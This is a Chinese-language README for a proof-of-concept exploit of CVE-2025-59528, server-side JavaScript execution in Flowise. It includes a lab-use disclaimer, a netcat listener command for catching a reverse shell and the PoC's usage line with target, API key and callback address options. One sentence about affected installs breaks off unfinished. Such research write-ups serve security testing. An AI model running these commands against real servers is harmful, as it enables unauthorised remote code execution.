
The poc of CVE-2025-59528
在隔离的实验室环境中研究 CVE-2025-59528 的概念验证。
[!WARNING] 免责声明
本项目严格用于教育目的、安全研究以及对您拥有或已获明确授权测试的系统进行测试。
未经所有者许可,请勿对第三方服务器、公共服务或基础设施使用此 PoC。
作者不对因滥用本项目而造成的任何损害、数据丢失、服务中断或法律后果负责。
此 PoC 演示了 CVE-2025-59528 的潜在影响,该漏洞涉及 Flowise 中处理用户可控的 mcpServerConfig。
在某些条件下,该漏洞可能允许攻击者在服务端上下文中执行任意 JavaScript 代码。
测试前请务必确认目标安装的确切版本。
requests安装 Python 依赖:
pip install requests
运行 netcat 以获取 shell:
nc -lvnp <YOUR_PORT>
使用以下命令运行 PoC:
python3 poc.py \
-t http://TARGET:PORT \
-o api_key \
-i CALLBACK_IP \
-p CALLBACK_PORT
测试应在隔离的虚拟或实验室网络中进行。
┌──────────────────┐
│ PoC Machine │
│ │
│ Python PoC │
└────────┬─────────┘
│
│ Isolated Network
│
┌────────▼─────────┐
│ Flowise 3.0.5 │
│ Test Instance │
└──────────────────┘
请勿将故意存在漏洞的 Flowise 实例直接暴露到公共互联网。
如果您正在运行受影响版本的 Flowise:
使用本项目即表示您确认自行负责遵守所有适用的法律法规。
请仅对您拥有或已获明确授权进行安全测试的系统使用此 PoC。
| 参数 | 描述 |
|---|
-t, --target | Flowise 测试实例的 URL |
-o, --api_key | API 密钥 |
-i, --ip | 测试机器的 IP 地址 |
-p, --port | 测试环境使用的端口 |